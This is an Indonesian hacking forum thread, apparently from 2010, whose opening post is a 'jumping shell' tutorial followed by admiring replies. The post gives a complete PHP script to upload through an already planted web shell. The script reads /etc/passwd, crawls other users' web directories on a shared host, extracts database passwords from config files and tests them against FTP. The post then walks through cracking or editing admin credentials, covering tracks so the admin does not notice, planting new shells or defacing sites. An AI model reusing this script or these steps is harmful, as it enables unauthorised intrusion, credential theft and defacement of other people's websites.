Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[TUTORIAL] Simple Jumping Shell

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

[TUTORIAL] Simple Jumping Shell

Postby juara1 » Sat May 15, 2010 10:26 am

Hehehe Mav Pertama Kali Sharing Tutorial, kalo uda ngerti mav ya ,, sharing aja
Ni sistemnya cm scanning Dir website yang satu hosting dengan shell yang kita punya ( ga semuanya shell berhasil )
biasanya kalo open read /etc/passwd terbuka seperti dibawah kadang bisa discan
Code: Select all
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync

1. siapkan shell yang kamu punya
Image

2. upload scan.php
Image
Code: Select all
    <?php
    echo "<html>";
    echo "<title>JU4RA | CYBER Forum Yogyafree Keren Yach</title><body>";

    set_time_limit(0);
    ##################
    @$passwd=fopen('/etc/passwd','r');
    if (!$passwd) {
    echo "[-] Error : coudn't read /etc/passwd";
    exit;
    }
    $path_to_public=array();
    $users=array();
    $pathtoconf=array();
    $i=0;

    while(!feof($passwd)) {
    $str=fgets($passwd);
    if ($i>35) {
    $pos=strpos($str,":");
    $username=substr($str,0,$pos);
    $dirz="/home/$username/public_html/";
    if (($username!="")) {
    if (is_readable($dirz)) {
    array_push($users,$username);
    array_push($path_to_public,$dirz);
    }
    }
    }
    $i++;
    }
    ###################

    #########################
    echo "<br><br>";
    echo "<textarea name='main_window' cols=100 rows=20>";

    echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
    echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";

    echo "[~] Searching for passwords in config.* files...\n\n";
    foreach ($users as $user) {
    $path="/home/$user/public_html/";
    read_dir($path,$user);
    }

    echo "\n[+] Done\n";

    function read_dir($path,$username) {
    if ($handle = opendir($path)) {
    while (false !== ($file = readdir($handle))) {
    $fpath="$path$file";
    if (($file!='.') and ($file!='..')) {
    if (is_readable($fpath)) {
    $dr="$fpath/";
    if (is_dir($dr)) {
    read_dir($dr,$username);
    }
    else {
    if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='configuration.php') or ($file=='db_connect.php')) {
    $pass=get_pass($fpath);
    if ($pass!='') {
    echo "[+] $fpath\n$pass\n";
    ftp_check($username,$pass);
    }
    }
    }
    }
    }
    }
    }
    }

    function get_pass($link) {
    @$config=fopen($link,'r');
    while(!feof($config)) {
    $line=fgets($config);
    if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
    if (strrpos($line,'"'))
    $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
    else
    $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
    return $pass;
    }
    }
    }

    function ftp_check($login,$pass) {
    @$ftp=ftp_connect('127.0.0.1');
    if ($ftp) {
    @$res=ftp_login($ftp,$login,$pass);
    if ($res) {
    echo '[FTP] '.$login.':'.$pass."  Success\n";
    }
    else ftp_quit($ftp);
    }
    }

    echo "</textarea><br>";

    echo "</body></html>";
    ?>

3. Buka file scan.php msl: http://targer.com/scan.php
tunggu beberapa saat, emang agak lama
Image

4. Buka shell kamu copykan hasil scannan tadi ke change dir shell kamu ato masukkan dir config ke read file
Image

5. Setelah dapat login Sql dbnya ,, crack dah passwordnya ,, kalo ga bisa di crack edit aja ,,
asal jangan lupa ntar dikembalikan kesemula ,, biar admin ga tau ,,

6. Setelah itu login di admin page webnya

7. upload dah shell baru ,, ato deface ,,

mav kalo kurang jelas ato repost ,,
Thankz for All :circle:
asuuuuuuuuu
User avatar
juara1
 
Posts: 42
Joined: Thu Jul 24, 2008 1:02 am
Location: http://ju4ra.me

Re: [TUTORIAL] Simple Jumping Shell

Postby Digital Cat » Sat May 15, 2010 2:43 pm

wow..

mantep gan..

hebat kamu ini..

paten.. paten..
User avatar
Digital Cat
 
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: [TUTORIAL] Simple Jumping Shell

Postby indounderground » Sat May 15, 2010 6:33 pm

salut2
wes ngge tutorial saiki
kalah rek aku
User avatar
indounderground
 
Posts: 95
Joined: Thu Sep 07, 2006 6:14 am
Location: Somewhere underwear everywear :P

Re: [TUTORIAL] Simple Jumping Shell

Postby shad.hckr » Sat May 15, 2010 7:18 pm

akhirnya mas juara mengeluarkan jurus mautnya.. :love: :love: :love:
tengkyuh ya pak.. :kaca: :kaca: :kaca: :kaca:
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [TUTORIAL] Simple Jumping Shell

Postby juara1 » Sun May 16, 2010 7:16 am

indounderground wrote:salut2
wes ngge tutorial saiki
kalah rek aku

wadu master indo ,, sam ,, aq pgn nang ngen e sampean ,, ntar lek mau kesana tak sms ,,
hehhe iseng2 ae sam ,, timbang nganggur ,,, :usap:
asuuuuuuuuu
User avatar
juara1
 
Posts: 42
Joined: Thu Jul 24, 2008 1:02 am
Location: http://ju4ra.me

Re: [TUTORIAL] Simple Jumping Shell

Postby dark_superman » Sun May 16, 2010 9:57 pm

:cry: :cry: wowow

jumping shell ya mantab deh kaka keren :ngakak:
User avatar
dark_superman
 
Posts: 13
Joined: Mon Nov 17, 2008 3:44 pm

Re: [TUTORIAL] Simple Jumping Shell

Postby Neo-Gabriel » Mon May 17, 2010 9:23 pm

Wow, berb0b0t :D ijin mempelajari bro
In the name of Allah. the most gracious, the most merciful..
http://neo-gabriel.uni.cc/v1/ ~ gabriel site's
Neo-Gabriel
 
Posts: 4
Joined: Fri Aug 07, 2009 4:33 pm

Re: [TUTORIAL] Simple Jumping Shell

Postby ecko » Mon May 17, 2010 10:19 pm

Weiiiiiih....mantap kk tutor nya....
:ngakak: :ngakak: :ngakak:
User avatar
ecko
 
Posts: 112
Joined: Sat Mar 17, 2007 9:18 pm
Location: CianjuR

Re: [TUTORIAL] Simple Jumping Shell

Postby aries deris » Mon May 17, 2010 10:41 pm

wew hebat kk
ajarin kk :D
What you believe to be true is false
what you thing to be done is wrong
believe me the battle will never end
User avatar
aries deris
 
Posts: 65
Joined: Sat Nov 17, 2007 10:12 pm
Location: neverland

Re: [TUTORIAL] Simple Jumping Shell

Postby juara1 » Tue May 18, 2010 7:22 am

aries deris wrote:wew hebat kk
ajarin kk :D

walah kk deris ,, wwkkw ,, ris ,, ayo golek JD ,, klunting2 ,, ngelak aq ,, wkwkw
:malumalu: :malumalu: :malumalu:
asuuuuuuuuu
User avatar
juara1
 
Posts: 42
Joined: Thu Jul 24, 2008 1:02 am
Location: http://ju4ra.me

leave a comment

Next

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 25 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id